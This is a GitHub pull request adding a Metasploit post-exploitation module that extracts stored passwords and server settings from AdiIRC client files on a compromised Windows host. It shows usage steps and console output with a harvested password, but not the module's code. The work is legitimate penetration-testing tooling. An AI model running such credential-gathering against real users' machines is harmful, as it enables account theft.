Add Adi IRC PackRat module #19169

Merged
7 commits merged into from May 17, 2024

The-Pink-Panther
Contributor

As a part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new /post/windows/gather/credentials module for the Adi IRC Client. https://www.adiirc.com/

This pull request will add two files:

  1. modules/post/windows/gather/credentials/adi_irc.rb
  2. documentation/modules/post/windows/gather/credentials/adi_irc.md

Verification

  1. Start msfconsole
  2. Get a Meterpreter session on a Windows system
  3. use post/windows/gather/credentials/adi_irc
  4. Set SESSION 1
  5. run

Scenario

Using AdiIRC Client v4.4 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045

msf6 post(windows/gather/credentials/adi_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Adi irc's Config file found
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
[*] Adi irc Config.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083920_default_10.0.0.2_AdiIRCconfig.ba_051695.bak

[+] serverhost=chat.freenode.net
[+] Serverhost=irc.test.net
[+] serverport=6667
[+] Serverport=6667
[+] Usernick=TheTester
[+] QuickPassword=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_949744.bak
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
[*] Adi irc Config.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCconfig.in_618977.ini

[+] serverhost=chat.freenode.net
[+] Serverhost=irc.test.net
[+] serverport=6667
[+] Serverport=6667
[+] Usernick=TheTester
[+] QuickPassword=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_981500.ini
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
[*] Adi irc Networks.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCnetworks._976889.ini

[+] File with data saved:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_EXTRACTIONconfig_407804.ini
[*] Adi irc's Networks file found
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
[*] Adi irc Networks.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._497206.ini

[*] undefined method `each' for nil:NilClass
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
[*] Adi irc Networks.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._102963.bak

[*] undefined method `each' for nil:NilClass
[*] PackRat credential sweep Completed
[*] Post module execution completed

@The-Pink-Panther The-Pink-Panther changed the title Adi irc packrat module Add Adi IRC PackRat module May 8, 2024
Contributor

@cgranleese-r7 cgranleese-r7 left a comment

The other PRs have suggestions that are relevant here as well.

@bwatters-r7 bwatters-r7 self-assigned this May 15, 2024
@bwatters-r7
Contributor

msf6 post(windows/gather/credentials/adi_irc) > show options

Module options (post/windows/gather/credentials/adi_irc):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, quick_connect, Networks)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   SESSION       1                yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/adi_irc) > set verbose true
verbose => true
msf6 post(windows/gather/credentials/adi_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Starting Packrat...
[*] Adi irc's base folder found
[*] Found the folder containing specified artifact for config.
[-] Adi irc's Config not found in msfuser's user directory

[-] Skipping config since it was not found on the user's folder.
[*] Adi irc's base folder found
[*] Found the folder containing specified artifact for networks.
[-] Adi irc's Networks not found in msfuser's user directory

[-] Skipping networks since it was not found on the user's folder.
[*] PackRat credential sweep Completed
[*] Post module execution completed

The-Pink-Panther and others added 7 commits May 17, 2024 09:58
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label May 17, 2024
@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in 20e0834 May 17, 2024
@bwatters-r7
Contributor

Release Notes

This adds a gather module leveraging Packrat targeting Adi IRC client.
